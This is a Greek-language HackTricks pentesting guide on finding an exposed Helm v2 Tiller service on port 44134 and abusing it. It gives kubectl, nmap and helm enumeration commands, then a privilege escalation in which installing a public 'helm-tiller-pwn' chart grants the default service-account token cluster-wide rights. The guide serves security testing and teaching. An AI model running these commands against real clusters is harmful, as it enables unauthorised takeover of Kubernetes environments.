hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

7.4 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Βασικές Πληροφορίες

Το Helm είναι ο διαχειριστής πακέτων για το Kubernetes. Επιτρέπει την συσκευασία των αρχείων YAML και τη διανομή τους σε δημόσιους και ιδιωτικούς αποθετήριους. Αυτά τα πακέτα ονομάζονται Helm Charts. Ο Tiller είναι ο υπηρεσία που τρέχει από προεπιλογή στη θύρα 44134 προσφέροντας την υπηρεσία.

Προεπιλεγμένη θύρα: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Απαρίθμηση

Εάν μπορείτε να απαριθμήσετε τα pods και/ή τις υπηρεσίες διαφορετικών namespaces, απαριθμήστε τα και αναζητήστε αυτά που έχουν τη λέξη "tiller" στο όνομά τους:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Παραδείγματα:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

Μπορείτε επίσης να προσπαθήσετε να βρείτε αυτήν την υπηρεσία ελέγχοντας τη θύρα 44134:

sudo nmap -sS -p 44134 <IP>

Αφού το ανακαλύψετε, μπορείτε να επικοινωνήσετε με αυτό κατεβάζοντας την εφαρμογή πελάτη helm. Μπορείτε να χρησιμοποιήσετε εργαλεία όπως το homebrew, ή να κοιτάξετε την επίσημη σελίδα κυκλοφοριών. Για περισσότερες λεπτομέρειες ή για άλλες επιλογές, δείτε ο οδηγός εγκατάστασης.

Στη συνέχεια, μπορείτε να απαριθμήσετε την υπηρεσία:

helm --host tiller-deploy.kube-system:44134 version

Ανόδου Προνομίων

Από προεπιλογή, το Helm2 είναι εγκατεστημένο στο namespace kube-system με υψηλά προνόμια, οπότε αν βρείτε την υπηρεσία και έχετε πρόσβαση σε αυτήν, αυτό μπορεί να σας επιτρέψει να αναβαθμίσετε τα προνόμια.

Το μόνο που χρειάζεται να κάνετε είναι να εγκαταστήσετε ένα πακέτο όπως αυτό: https://github.com/Ruil1n/helm-tiller-pwn που θα δώσει στο προεπιλεγμένο διακριτικό υπηρεσίας πρόσβαση σε όλο το cluster.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

Στο http://rui0.cn/archives/1573 έχετε την εξήγηση της επίθεσης, αλλά βασικά, αν διαβάσετε τα αρχεία clusterrole.yaml και clusterrolebinding.yaml μέσα στον φάκελο helm-tiller-pwn/pwnchart/templates/ μπορείτε να δείτε πώς δίνονται όλα τα προνόμια στο προεπιλεγμένο token.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: